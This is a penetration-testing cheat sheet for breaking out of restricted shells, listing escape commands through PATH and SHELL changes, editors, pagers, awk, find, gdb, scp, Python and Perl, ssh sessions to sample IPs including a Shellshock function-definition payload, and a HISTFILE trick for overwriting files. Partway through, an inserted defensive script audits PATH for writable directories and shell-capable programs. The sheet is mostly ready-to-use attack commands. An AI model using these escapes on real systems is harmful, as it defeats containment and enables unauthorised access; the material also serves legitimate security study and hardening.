CHROOT JAIL


======================================

|       BREAKING OUT OF SHELLCATRAZ          |

======================================

Run env to see the exported environment variables.

echo $PATH

(Find out which directories your commands are resolved from)

echo $SHELL

(Find out which shell you are in)




=========================================

QUICK ESCAPES

=========================================

- If / is allowed in commands, break out by running

/bin/bash or /bin/sh

- If you can set the PATH or SHELL variables, do the following

export PATH=/bin:/usr/bin:$PATH

export SHELL=/bin/sh

- If you can copy files into a directory on the existing PATH, run

cp /bin/sh /some/dir/from/PATH; sh




==========================================

BYPASS USING ANOTHER SERVICE

==========================================

ftp --> !/bin/sh

gdb --> !/bin/sh

more / less / man --> !/bin/sh

vi / vim --> :!/bin/sh

scp --> scp -S /tmp/GetMeOut.sh x y:

awk --> awk 'BEGIN {system("/bin/sh")}'

find --> find / -name someName -exec /bin/sh \;




==========================================

GO IN WITH OUTSIDE HELP

==========================================

ssh restricted@10.10.10.122 -t "/bin/sh"

ssh restricted@10.10.10.123 -t "bash --noprofile"

ssh restricted@10.10.10.124 -t "() { :; }; /bin/bash"

(Shellshock function-definition payload; only works if the server's bash is unpatched)




==========================================

INVOKE SHELL THROUGH SCRIPTING LANG

==========================================

python -c 'import os; os.system("/bin/bash")'

perl -e 'exec "/bin/sh";'

echo 'Malicious code' | tee scripts.sh
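
Added example (not part of the original sheet): a defender-side audit to run as the restricted account before handing it out. It flags PATH directories the account can write to (the cp trick under QUICK ESCAPES) and PATH entries that are programs this sheet lists as able to start a shell. The name audit_restricted_path and the --audit flag are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original sheet. Program names below are the
# ones the sheet lists as able to start a shell, plus sh and bash themselves.
ESCAPE_BINS="ftp gdb more less man vi vim scp awk find python perl tee sh bash"

# audit_restricted_path PATH_STRING   (hypothetical helper name)
# Prints one finding per line and returns 1 if anything was found:
#   WRITABLE <dir>   the account can copy a shell into this PATH directory
#   ESCAPE <file>    executable that can hand the account a full shell
audit_restricted_path() {
    findings=0
    old_ifs=$IFS
    set -f                        # no globbing while splitting on ':'
    IFS=:
    set -- $1
    IFS=$old_ifs
    set +f
    for dir in "$@"; do
        [ -n "$dir" ] || dir=.    # an empty PATH entry means the current dir
        [ -d "$dir" ] || continue
        if [ -w "$dir" ]; then
            echo "WRITABLE $dir"
            findings=1
        fi
        for name in $ESCAPE_BINS; do
            if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
                echo "ESCAPE $dir/$name"
                findings=1
            fi
        done
    done
    return "$findings"
}

# Assumed invocation: run as the restricted account with --audit.
if [ "${1:-}" = "--audit" ]; then
    audit_restricted_path "$PATH" || exit 1
fi
```

An empty report means neither the cp trick nor the listed programs are reachable through PATH; it does not cover commands the account can still reach by typing a / in the name.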




==========================================

HISTORY FILE TRICK

==========================================

Set HISTFILE variable to a file you want to overwrite

Set HISTSIZE variable to 0 and then immediately to 100

Execute lines that you want written to the file

Log out and log back in